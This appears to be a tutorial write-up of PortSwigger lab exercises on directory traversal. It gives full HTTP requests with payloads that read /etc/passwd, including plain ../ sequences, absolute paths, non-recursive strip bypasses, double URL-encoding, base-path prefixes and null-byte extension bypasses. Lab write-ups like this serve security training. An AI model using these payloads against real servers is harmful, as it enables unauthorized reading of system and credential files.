# Directory traversal
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.

Since this is quite an easy topic, I'll summarize it all it one lab.

To perform directory traversal you'll need to use the sequence action.
```txt
../ or ..\
```
By each ../, go up 1 directory.
So if we're in var/www/html.
If we use ../, we'll be in var/www/.

Both works on windows but only ../ works in Linux environments.

Let's say we have a simple site that fetches images for a product in a shop.
```html
GET /image?filename=32.jpg HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
How do we know that this is vulnerable to directory traversal? Let's try fetching another image with this.
```html
GET /image?filename=33.jpg HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
And if we get a 200 response, that means that it is vulnerable since it is fetching our query.
Let's explore the common cases of directory traversal.

## File path traversal, simple case.
Basically there is no filter on our input, so we can just search for anything that we want.
```html
GET /image?filename=../../../etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```

## File path traversal, traversal sequence blocked with absolute path bypass
This lab doesn't let us query other path, so we can try using the absolute path of our target which /etc/passwd
```html
GET /image?filename=/etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```

## File path traversal, traversal sequences stripped non-recursively.
So let's see what's happening in this lab. Let's try our common payload.
```html
```html
GET /image?filename=../../../etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
And we get an error, file not found. According to the lab name, our path sequence ../ is being stripped but non-recursively. Let's try double ../
```html
GET /image?filename=....//....//....//etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
So since it's checking non recursively for ../ . It'll just remove the first instance of it leaving us with
```txt
../../../etc/passwd
```
And we solved the lab.

## File path traversal, traversal sequence stripped with superfluous URL-decode
Sometimes, website URL encodes our query which can be a bummer. But afraid not let's try it.
```html
GET /image?filename=../../../etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
That doesn't work, double ../ doesn't work, and single URL-encoding doesn't work.
How about double encoding?
```html
GET /image?filename=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
Voila, we got through and solved it.

## File path traversal, validation of start of path
Some sites also, does a filter which requires us a base path or the request is dropped.
Let's observe the base path of our target.
```html
GET /image?filename=/var/www/images/32.jpg HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
Let's try another image but without the base path, and it doesn't work, but another image with the base path works, so we know that we need **/var/www/images** to perform our attack. So we can do is append our traversal sequence after the base path.
```html
GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
And that should work!

And for our last lab.

## File path traversal, validation of file extension with null byte bypass.
And lastly, website will check whether the file name we're querying for matches what the server wants. If it wants a image extension, the query must also include a image extension.
But don't worry, we have something called "Null Bytes".

To keep it simple, Null byte basically terminates anything after its.
So 
```
img.jpg%00.png
```
It will terminate the .png extension but the filter will allow it since we have a .png extension.

So let's try on our lab.
```html
GET /image?filename=../../../etc/passwd HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
It doesn't work since it wants a .jpg file. Let's test it out with Null byte characters.
```html
GET /image?filename=../../../etc/passwd%00.jpg HTTP/1.1
Host: target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net
Cookie: session=sSPRz0RvSDRaF9BfuO8WjEq6SFdEIvTb
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acbf1fa71f727d92804210ff00e9002d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
And we solved it and that's all for Directory Traversal!
